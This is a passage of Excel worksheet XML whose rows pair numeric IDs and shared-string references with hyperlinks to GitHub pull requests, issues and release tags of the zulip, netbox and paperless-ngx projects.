        <f>HYPERLINK("https://github.com/zulip/zulip/pull/17597", "https://github.com/zulip/zulip/pull/17597")</f>
        <v>https://github.com/zulip/zulip/pull/17597</v>
      </c>
    </row>
    <row r="25" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A25">
        <v>159</v>
      </c>
      <c r="B25" t="s">
        <v>621</v>
      </c>
      <c r="C25" t="s">
        <v>645</v>
      </c>
      <c r="D25" t="s">
        <v>10</v>
      </c>
      <c r="E25" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/19871", "https://github.com/zulip/zulip/pull/19871")</f>
        <v>https://github.com/zulip/zulip/pull/19871</v>
      </c>
    </row>
    <row r="26" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A26">
        <v>169</v>
      </c>
      <c r="B26" t="s">
        <v>610</v>
      </c>
      <c r="C26" t="s">
        <v>646</v>
      </c>
      <c r="D26" t="s">
        <v>10</v>
      </c>
      <c r="E26" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/20137", "https://github.com/zulip/zulip/pull/20137")</f>
        <v>https://github.com/zulip/zulip/pull/20137</v>
      </c>
    </row>
    <row r="27" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A27">
        <v>176</v>
      </c>
      <c r="B27" t="s">
        <v>612</v>
      </c>
      <c r="C27" t="s">
        <v>647</v>
      </c>
      <c r="D27" t="s">
        <v>10</v>
      </c>
      <c r="E27" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/21233", "https://github.com/zulip/zulip/pull/21233")</f>
        <v>https://github.com/zulip/zulip/pull/21233</v>
      </c>
    </row>
    <row r="28" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A28">
        <v>193</v>
      </c>
      <c r="B28" t="s">
        <v>621</v>
      </c>
      <c r="C28" t="s">
        <v>648</v>
      </c>
      <c r="D28" t="s">
        <v>10</v>
      </c>
      <c r="E28" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/23125", "https://github.com/zulip/zulip/pull/23125")</f>
        <v>https://github.com/zulip/zulip/pull/23125</v>
      </c>
    </row>
    <row r="29" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A29">
        <v>218</v>
      </c>
      <c r="B29" t="s">
        <v>637</v>
      </c>
      <c r="C29" t="s">
        <v>649</v>
      </c>
      <c r="D29" t="s">
        <v>10</v>
      </c>
      <c r="E29" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/24334", "https://github.com/zulip/zulip/pull/24334")</f>
        <v>https://github.com/zulip/zulip/pull/24334</v>
      </c>
    </row>
    <row r="30" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A30">
        <v>219</v>
      </c>
      <c r="B30" t="s">
        <v>619</v>
      </c>
      <c r="C30" t="s">
        <v>650</v>
      </c>
      <c r="D30" t="s">
        <v>10</v>
      </c>
      <c r="E30" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/24345", "https://github.com/zulip/zulip/pull/24345")</f>
        <v>https://github.com/zulip/zulip/pull/24345</v>
      </c>
    </row>
    <row r="31" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A31">
        <v>222</v>
      </c>
      <c r="B31" t="s">
        <v>651</v>
      </c>
      <c r="C31" t="s">
        <v>652</v>
      </c>
      <c r="D31" t="s">
        <v>10</v>
      </c>
      <c r="E31" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/25667", "https://github.com/zulip/zulip/pull/25667")</f>
        <v>https://github.com/zulip/zulip/pull/25667</v>
      </c>
    </row>
    <row r="32" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A32">
        <v>227</v>
      </c>
      <c r="B32" t="s">
        <v>610</v>
      </c>
      <c r="C32" t="s">
        <v>653</v>
      </c>
      <c r="D32" t="s">
        <v>10</v>
      </c>
      <c r="E32" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/26717", "https://github.com/zulip/zulip/pull/26717")</f>
        <v>https://github.com/zulip/zulip/pull/26717</v>
      </c>
    </row>
    <row r="33" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A33">
        <v>229</v>
      </c>
      <c r="B33" t="s">
        <v>621</v>
      </c>
      <c r="C33" t="s">
        <v>654</v>
      </c>
      <c r="D33" t="s">
        <v>10</v>
      </c>
      <c r="E33" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/26866", "https://github.com/zulip/zulip/pull/26866")</f>
        <v>https://github.com/zulip/zulip/pull/26866</v>
      </c>
    </row>
    <row r="34" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A34">
        <v>230</v>
      </c>
      <c r="B34" t="s">
        <v>655</v>
      </c>
      <c r="C34" t="s">
        <v>656</v>
      </c>
      <c r="D34" t="s">
        <v>10</v>
      </c>
      <c r="E34" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/28132", "https://github.com/zulip/zulip/pull/28132")</f>
        <v>https://github.com/zulip/zulip/pull/28132</v>
      </c>
    </row>
    <row r="35" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A35">
        <v>233</v>
      </c>
      <c r="B35" t="s">
        <v>610</v>
      </c>
      <c r="C35" t="s">
        <v>657</v>
      </c>
      <c r="D35" t="s">
        <v>10</v>
      </c>
      <c r="E35" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/28503", "https://github.com/zulip/zulip/issues/28503")</f>
        <v>https://github.com/zulip/zulip/issues/28503</v>
      </c>
    </row>
    <row r="36" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A36">
        <v>240</v>
      </c>
      <c r="B36" t="s">
        <v>610</v>
      </c>
      <c r="C36" t="s">
        <v>658</v>
      </c>
      <c r="D36" t="s">
        <v>10</v>
      </c>
      <c r="E36" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/29866", "https://github.com/zulip/zulip/pull/29866")</f>
        <v>https://github.com/zulip/zulip/pull/29866</v>
      </c>
    </row>
    <row r="37" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A37">
        <v>244</v>
      </c>
      <c r="B37" t="s">
        <v>610</v>
      </c>
      <c r="C37" t="s">
        <v>659</v>
      </c>
      <c r="D37" t="s">
        <v>162</v>
      </c>
      <c r="E37" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/51", "https://github.com/netbox-community/netbox/issues/51")</f>
        <v>https://github.com/netbox-community/netbox/issues/51</v>
      </c>
    </row>
    <row r="38" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A38">
        <v>274</v>
      </c>
      <c r="B38" t="s">
        <v>660</v>
      </c>
      <c r="C38" t="s">
        <v>661</v>
      </c>
      <c r="D38" t="s">
        <v>162</v>
      </c>
      <c r="E38" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/4988", "https://github.com/netbox-community/netbox/issues/4988")</f>
        <v>https://github.com/netbox-community/netbox/issues/4988</v>
      </c>
    </row>
    <row r="39" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A39">
        <v>289</v>
      </c>
      <c r="B39" t="s">
        <v>619</v>
      </c>
      <c r="C39" t="s">
        <v>662</v>
      </c>
      <c r="D39" t="s">
        <v>162</v>
      </c>
      <c r="E39" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7228", "https://github.com/netbox-community/netbox/issues/7228")</f>
        <v>https://github.com/netbox-community/netbox/issues/7228</v>
      </c>
    </row>
    <row r="40" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A40">
        <v>290</v>
      </c>
      <c r="B40" t="s">
        <v>619</v>
      </c>
      <c r="C40" t="s">
        <v>663</v>
      </c>
      <c r="D40" t="s">
        <v>162</v>
      </c>
      <c r="E40" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/pull/7307", "https://github.com/netbox-community/netbox/pull/7307")</f>
        <v>https://github.com/netbox-community/netbox/pull/7307</v>
      </c>
    </row>
    <row r="41" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A41">
        <v>302</v>
      </c>
      <c r="B41" t="s">
        <v>664</v>
      </c>
      <c r="C41" t="s">
        <v>665</v>
      </c>
      <c r="D41" t="s">
        <v>162</v>
      </c>
      <c r="E41" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/pull/9331", "https://github.com/netbox-community/netbox/pull/9331")</f>
        <v>https://github.com/netbox-community/netbox/pull/9331</v>
      </c>
    </row>
    <row r="42" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A42">
        <v>304</v>
      </c>
      <c r="B42" t="s">
        <v>664</v>
      </c>
      <c r="C42" t="s">
        <v>666</v>
      </c>
      <c r="D42" t="s">
        <v>162</v>
      </c>
      <c r="E42" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/9833", "https://github.com/netbox-community/netbox/issues/9833")</f>
        <v>https://github.com/netbox-community/netbox/issues/9833</v>
      </c>
    </row>
    <row r="43" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A43">
        <v>306</v>
      </c>
      <c r="B43" t="s">
        <v>610</v>
      </c>
      <c r="C43" t="s">
        <v>667</v>
      </c>
      <c r="D43" t="s">
        <v>162</v>
      </c>
      <c r="E43" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/pull/10570", "https://github.com/netbox-community/netbox/pull/10570")</f>
        <v>https://github.com/netbox-community/netbox/pull/10570</v>
      </c>
    </row>
    <row r="44" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A44">
        <v>309</v>
      </c>
      <c r="B44" t="s">
        <v>668</v>
      </c>
      <c r="C44" t="s">
        <v>669</v>
      </c>
      <c r="D44" t="s">
        <v>162</v>
      </c>
      <c r="E44" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/11213", "https://github.com/netbox-community/netbox/issues/11213")</f>
        <v>https://github.com/netbox-community/netbox/issues/11213</v>
      </c>
    </row>
    <row r="45" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A45">
        <v>317</v>
      </c>
      <c r="B45" t="s">
        <v>610</v>
      </c>
      <c r="C45" t="s">
        <v>670</v>
      </c>
      <c r="D45" t="s">
        <v>162</v>
      </c>
      <c r="E45" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/12838", "https://github.com/netbox-community/netbox/issues/12838")</f>
        <v>https://github.com/netbox-community/netbox/issues/12838</v>
      </c>
    </row>
    <row r="46" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A46">
        <v>318</v>
      </c>
      <c r="B46" t="s">
        <v>610</v>
      </c>
      <c r="C46" t="s">
        <v>671</v>
      </c>
      <c r="D46" t="s">
        <v>162</v>
      </c>
      <c r="E46" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/pull/12946", "https://github.com/netbox-community/netbox/pull/12946")</f>
        <v>https://github.com/netbox-community/netbox/pull/12946</v>
      </c>
    </row>
    <row r="47" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A47">
        <v>319</v>
      </c>
      <c r="B47" t="s">
        <v>612</v>
      </c>
      <c r="C47" t="s">
        <v>672</v>
      </c>
      <c r="D47" t="s">
        <v>162</v>
      </c>
      <c r="E47" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/14996", "https://github.com/netbox-community/netbox/issues/14996")</f>
        <v>https://github.com/netbox-community/netbox/issues/14996</v>
      </c>
    </row>
    <row r="48" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A48">
        <v>321</v>
      </c>
      <c r="B48" t="s">
        <v>673</v>
      </c>
      <c r="C48" t="s">
        <v>674</v>
      </c>
      <c r="D48" t="s">
        <v>162</v>
      </c>
      <c r="E48" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/15497", "https://github.com/netbox-community/netbox/issues/15497")</f>
        <v>https://github.com/netbox-community/netbox/issues/15497</v>
      </c>
    </row>
    <row r="49" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A49">
        <v>323</v>
      </c>
      <c r="B49" t="s">
        <v>633</v>
      </c>
      <c r="C49" t="s">
        <v>675</v>
      </c>
      <c r="D49" t="s">
        <v>162</v>
      </c>
      <c r="E49" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/15497", "https://github.com/netbox-community/netbox/issues/15497")</f>
        <v>https://github.com/netbox-community/netbox/issues/15497</v>
      </c>
    </row>
    <row r="50" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A50">
        <v>325</v>
      </c>
      <c r="B50" t="s">
        <v>610</v>
      </c>
      <c r="C50" t="s">
        <v>676</v>
      </c>
      <c r="D50" t="s">
        <v>162</v>
      </c>
      <c r="E50" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/pull/15734", "https://github.com/netbox-community/netbox/pull/15734")</f>
        <v>https://github.com/netbox-community/netbox/pull/15734</v>
      </c>
    </row>
    <row r="51" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A51">
        <v>326</v>
      </c>
      <c r="B51" t="s">
        <v>610</v>
      </c>
      <c r="C51" t="s">
        <v>677</v>
      </c>
      <c r="D51" t="s">
        <v>162</v>
      </c>
      <c r="E51" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/pull/15911", "https://github.com/netbox-community/netbox/pull/15911")</f>
        <v>https://github.com/netbox-community/netbox/pull/15911</v>
      </c>
    </row>
    <row r="52" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A52">
        <v>331</v>
      </c>
      <c r="B52" t="s">
        <v>610</v>
      </c>
      <c r="C52" t="s">
        <v>678</v>
      </c>
      <c r="D52" t="s">
        <v>162</v>
      </c>
      <c r="E52" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/pull/17350", "https://github.com/netbox-community/netbox/pull/17350")</f>
        <v>https://github.com/netbox-community/netbox/pull/17350</v>
      </c>
    </row>
    <row r="53" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A53">
        <v>356</v>
      </c>
      <c r="B53" t="s">
        <v>639</v>
      </c>
      <c r="C53" t="s">
        <v>227</v>
      </c>
      <c r="D53" t="s">
        <v>162</v>
      </c>
      <c r="E53" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/1203", "https://github.com/zulip/zulip/issues/1203")</f>
        <v>https://github.com/zulip/zulip/issues/1203</v>
      </c>
    </row>
    <row r="54" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A54">
        <v>360</v>
      </c>
      <c r="B54" t="s">
        <v>639</v>
      </c>
      <c r="C54" t="s">
        <v>679</v>
      </c>
      <c r="D54" t="s">
        <v>162</v>
      </c>
      <c r="E54" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/1825", "https://github.com/zulip/zulip/pull/1825")</f>
        <v>https://github.com/zulip/zulip/pull/1825</v>
      </c>
    </row>
    <row r="55" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A55">
        <v>374</v>
      </c>
      <c r="B55" t="s">
        <v>639</v>
      </c>
      <c r="C55" t="s">
        <v>680</v>
      </c>
      <c r="D55" t="s">
        <v>162</v>
      </c>
      <c r="E55" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/3380", "https://github.com/zulip/zulip/issues/3380")</f>
        <v>https://github.com/zulip/zulip/issues/3380</v>
      </c>
    </row>
    <row r="56" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A56">
        <v>376</v>
      </c>
      <c r="B56" t="s">
        <v>610</v>
      </c>
      <c r="C56" t="s">
        <v>681</v>
      </c>
      <c r="D56" t="s">
        <v>162</v>
      </c>
      <c r="E56" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/3920", "https://github.com/zulip/zulip/pull/3920")</f>
        <v>https://github.com/zulip/zulip/pull/3920</v>
      </c>
    </row>
    <row r="57" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A57">
        <v>378</v>
      </c>
      <c r="B57" t="s">
        <v>639</v>
      </c>
      <c r="C57" t="s">
        <v>682</v>
      </c>
      <c r="D57" t="s">
        <v>162</v>
      </c>
      <c r="E57" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/4759", "https://github.com/zulip/zulip/pull/4759")</f>
        <v>https://github.com/zulip/zulip/pull/4759</v>
      </c>
    </row>
    <row r="58" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A58">
        <v>390</v>
      </c>
      <c r="B58" t="s">
        <v>639</v>
      </c>
      <c r="C58" t="s">
        <v>683</v>
      </c>
      <c r="D58" t="s">
        <v>162</v>
      </c>
      <c r="E58" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/6833", "https://github.com/zulip/zulip/pull/6833")</f>
        <v>https://github.com/zulip/zulip/pull/6833</v>
      </c>
    </row>
    <row r="59" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A59">
        <v>391</v>
      </c>
      <c r="B59" t="s">
        <v>664</v>
      </c>
      <c r="C59" t="s">
        <v>683</v>
      </c>
      <c r="D59" t="s">
        <v>162</v>
      </c>
      <c r="E59" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/6833", "https://github.com/zulip/zulip/pull/6833")</f>
        <v>https://github.com/zulip/zulip/pull/6833</v>
      </c>
    </row>
    <row r="60" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A60">
        <v>394</v>
      </c>
      <c r="B60" t="s">
        <v>684</v>
      </c>
      <c r="C60" t="s">
        <v>685</v>
      </c>
      <c r="D60" t="s">
        <v>162</v>
      </c>
      <c r="E60" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/7921", "https://github.com/zulip/zulip/issues/7921")</f>
        <v>https://github.com/zulip/zulip/issues/7921</v>
      </c>
    </row>
    <row r="61" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A61">
        <v>401</v>
      </c>
      <c r="B61" t="s">
        <v>612</v>
      </c>
      <c r="C61" t="s">
        <v>686</v>
      </c>
      <c r="D61" t="s">
        <v>162</v>
      </c>
      <c r="E61" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/10601", "https://github.com/zulip/zulip/pull/10601")</f>
        <v>https://github.com/zulip/zulip/pull/10601</v>
      </c>
    </row>
    <row r="62" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A62">
        <v>431</v>
      </c>
      <c r="B62" t="s">
        <v>687</v>
      </c>
      <c r="C62" t="s">
        <v>688</v>
      </c>
      <c r="D62" t="s">
        <v>162</v>
      </c>
      <c r="E62" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/14045", "https://github.com/zulip/zulip/pull/14045")</f>
        <v>https://github.com/zulip/zulip/pull/14045</v>
      </c>
    </row>
    <row r="63" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A63">
        <v>453</v>
      </c>
      <c r="B63" t="s">
        <v>610</v>
      </c>
      <c r="C63" t="s">
        <v>689</v>
      </c>
      <c r="D63" t="s">
        <v>162</v>
      </c>
      <c r="E63" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/17204", "https://github.com/zulip/zulip/pull/17204")</f>
        <v>https://github.com/zulip/zulip/pull/17204</v>
      </c>
    </row>
    <row r="64" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A64">
        <v>494</v>
      </c>
      <c r="B64" t="s">
        <v>612</v>
      </c>
      <c r="C64" t="s">
        <v>690</v>
      </c>
      <c r="D64" t="s">
        <v>162</v>
      </c>
      <c r="E64" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/22105", "https://github.com/zulip/zulip/issues/22105")</f>
        <v>https://github.com/zulip/zulip/issues/22105</v>
      </c>
    </row>
    <row r="65" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A65">
        <v>504</v>
      </c>
      <c r="B65" t="s">
        <v>637</v>
      </c>
      <c r="C65" t="s">
        <v>691</v>
      </c>
      <c r="D65" t="s">
        <v>162</v>
      </c>
      <c r="E65" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/23593", "https://github.com/zulip/zulip/pull/23593")</f>
        <v>https://github.com/zulip/zulip/pull/23593</v>
      </c>
    </row>
    <row r="66" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A66">
        <v>519</v>
      </c>
      <c r="B66" t="s">
        <v>633</v>
      </c>
      <c r="C66" t="s">
        <v>692</v>
      </c>
      <c r="D66" t="s">
        <v>162</v>
      </c>
      <c r="E66" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/24688", "https://github.com/zulip/zulip/pull/24688")</f>
        <v>https://github.com/zulip/zulip/pull/24688</v>
      </c>
    </row>
    <row r="67" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A67">
        <v>520</v>
      </c>
      <c r="B67" t="s">
        <v>633</v>
      </c>
      <c r="C67" t="s">
        <v>693</v>
      </c>
      <c r="D67" t="s">
        <v>162</v>
      </c>
      <c r="E67" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/24697", "https://github.com/zulip/zulip/pull/24697")</f>
        <v>https://github.com/zulip/zulip/pull/24697</v>
      </c>
    </row>
    <row r="68" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A68">
        <v>524</v>
      </c>
      <c r="B68" t="s">
        <v>610</v>
      </c>
      <c r="C68" t="s">
        <v>694</v>
      </c>
      <c r="D68" t="s">
        <v>162</v>
      </c>
      <c r="E68" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/26500", "https://github.com/zulip/zulip/pull/26500")</f>
        <v>https://github.com/zulip/zulip/pull/26500</v>
      </c>
    </row>
    <row r="69" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A69">
        <v>527</v>
      </c>
      <c r="B69" t="s">
        <v>621</v>
      </c>
      <c r="C69" t="s">
        <v>695</v>
      </c>
      <c r="D69" t="s">
        <v>162</v>
      </c>
      <c r="E69" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/27065", "https://github.com/zulip/zulip/pull/27065")</f>
        <v>https://github.com/zulip/zulip/pull/27065</v>
      </c>
    </row>
    <row r="70" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A70">
        <v>528</v>
      </c>
      <c r="B70" t="s">
        <v>621</v>
      </c>
      <c r="C70" t="s">
        <v>696</v>
      </c>
      <c r="D70" t="s">
        <v>162</v>
      </c>
      <c r="E70" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/27121", "https://github.com/zulip/zulip/pull/27121")</f>
        <v>https://github.com/zulip/zulip/pull/27121</v>
      </c>
    </row>
    <row r="71" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A71">
        <v>530</v>
      </c>
      <c r="B71" t="s">
        <v>697</v>
      </c>
      <c r="C71" t="s">
        <v>698</v>
      </c>
      <c r="D71" t="s">
        <v>162</v>
      </c>
      <c r="E71" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/27196", "https://github.com/zulip/zulip/issues/27196")</f>
        <v>https://github.com/zulip/zulip/issues/27196</v>
      </c>
    </row>
    <row r="72" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A72">
        <v>531</v>
      </c>
      <c r="B72" t="s">
        <v>612</v>
      </c>
      <c r="C72" t="s">
        <v>699</v>
      </c>
      <c r="D72" t="s">
        <v>162</v>
      </c>
      <c r="E72" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/27207", "https://github.com/zulip/zulip/issues/27207")</f>
        <v>https://github.com/zulip/zulip/issues/27207</v>
      </c>
    </row>
    <row r="73" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A73">
        <v>535</v>
      </c>
      <c r="B73" t="s">
        <v>642</v>
      </c>
      <c r="C73" t="s">
        <v>700</v>
      </c>
      <c r="D73" t="s">
        <v>162</v>
      </c>
      <c r="E73" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/28586", "https://github.com/zulip/zulip/issues/28586")</f>
        <v>https://github.com/zulip/zulip/issues/28586</v>
      </c>
    </row>
    <row r="74" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A74">
        <v>536</v>
      </c>
      <c r="B74" t="s">
        <v>701</v>
      </c>
      <c r="C74" t="s">
        <v>702</v>
      </c>
      <c r="D74" t="s">
        <v>162</v>
      </c>
      <c r="E74" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/28586", "https://github.com/zulip/zulip/issues/28586")</f>
        <v>https://github.com/zulip/zulip/issues/28586</v>
      </c>
    </row>
    <row r="75" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A75">
        <v>537</v>
      </c>
      <c r="B75" t="s">
        <v>621</v>
      </c>
      <c r="C75" t="s">
        <v>703</v>
      </c>
      <c r="D75" t="s">
        <v>162</v>
      </c>
      <c r="E75" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/28675", "https://github.com/zulip/zulip/pull/28675")</f>
        <v>https://github.com/zulip/zulip/pull/28675</v>
      </c>
    </row>
    <row r="76" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A76">
        <v>547</v>
      </c>
      <c r="B76" t="s">
        <v>610</v>
      </c>
      <c r="C76" t="s">
        <v>704</v>
      </c>
      <c r="D76" t="s">
        <v>162</v>
      </c>
      <c r="E76" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/29148", "https://github.com/zulip/zulip/pull/29148")</f>
        <v>https://github.com/zulip/zulip/pull/29148</v>
      </c>
    </row>
    <row r="77" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A77">
        <v>550</v>
      </c>
      <c r="B77" t="s">
        <v>610</v>
      </c>
      <c r="C77" t="s">
        <v>705</v>
      </c>
      <c r="D77" t="s">
        <v>162</v>
      </c>
      <c r="E77" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/29847", "https://github.com/zulip/zulip/pull/29847")</f>
        <v>https://github.com/zulip/zulip/pull/29847</v>
      </c>
    </row>
    <row r="78" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A78">
        <v>554</v>
      </c>
      <c r="B78" t="s">
        <v>621</v>
      </c>
      <c r="C78" t="s">
        <v>706</v>
      </c>
      <c r="D78" t="s">
        <v>162</v>
      </c>
      <c r="E78" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/30456", "https://github.com/zulip/zulip/pull/30456")</f>
        <v>https://github.com/zulip/zulip/pull/30456</v>
      </c>
    </row>
    <row r="79" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A79">
        <v>556</v>
      </c>
      <c r="B79" t="s">
        <v>610</v>
      </c>
      <c r="C79" t="s">
        <v>707</v>
      </c>
      <c r="D79" t="s">
        <v>162</v>
      </c>
      <c r="E79" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/30506", "https://github.com/zulip/zulip/issues/30506")</f>
        <v>https://github.com/zulip/zulip/issues/30506</v>
      </c>
    </row>
    <row r="80" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A80">
        <v>557</v>
      </c>
      <c r="B80" t="s">
        <v>610</v>
      </c>
      <c r="C80" t="s">
        <v>708</v>
      </c>
      <c r="D80" t="s">
        <v>162</v>
      </c>
      <c r="E80" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/30692", "https://github.com/zulip/zulip/pull/30692")</f>
        <v>https://github.com/zulip/zulip/pull/30692</v>
      </c>
    </row>
    <row r="81" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A81">
        <v>561</v>
      </c>
      <c r="B81" t="s">
        <v>610</v>
      </c>
      <c r="C81" t="s">
        <v>709</v>
      </c>
      <c r="D81" t="s">
        <v>402</v>
      </c>
      <c r="E81" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/releases/tag/v4.1.0", "https://github.com/netbox-community/netbox/releases/tag/v4.1.0")</f>
        <v>https://github.com/netbox-community/netbox/releases/tag/v4.1.0</v>
      </c>
    </row>
    <row r="82" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A82">
        <v>562</v>
      </c>
      <c r="B82" t="s">
        <v>610</v>
      </c>
      <c r="C82" t="s">
        <v>710</v>
      </c>
      <c r="D82" t="s">
        <v>402</v>
      </c>
      <c r="E82" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/releases/tag/v3.7.7", "https://github.com/netbox-community/netbox/releases/tag/v3.7.7")</f>
        <v>https://github.com/netbox-community/netbox/releases/tag/v3.7.7</v>
      </c>
    </row>
    <row r="83" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A83">
        <v>563</v>
      </c>
      <c r="B83" t="s">
        <v>610</v>
      </c>
      <c r="C83" t="s">
        <v>711</v>
      </c>
      <c r="D83" t="s">
        <v>402</v>
      </c>
      <c r="E83" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/releases/tag/v3.5.4", "https://github.com/netbox-community/netbox/releases/tag/v3.5.4")</f>
        <v>https://github.com/netbox-community/netbox/releases/tag/v3.5.4</v>
      </c>
    </row>
    <row r="84" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A84">
        <v>564</v>
      </c>
      <c r="B84" t="s">
        <v>610</v>
      </c>
      <c r="C84" t="s">
        <v>712</v>
      </c>
      <c r="D84" t="s">
        <v>402</v>
      </c>
      <c r="E84" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/releases/tag/v3.3.5", "https://github.com/netbox-community/netbox/releases/tag/v3.3.5")</f>
        <v>https://github.com/netbox-community/netbox/releases/tag/v3.3.5</v>
      </c>
    </row>
    <row r="85" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A85">
        <v>566</v>
      </c>
      <c r="B85" t="s">
        <v>610</v>
      </c>
      <c r="C85" t="s">
        <v>713</v>
      </c>
      <c r="D85" t="s">
        <v>162</v>
      </c>
      <c r="E85" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/pull/24", "https://github.com/paperless-ngx/paperless-ngx/pull/24")</f>
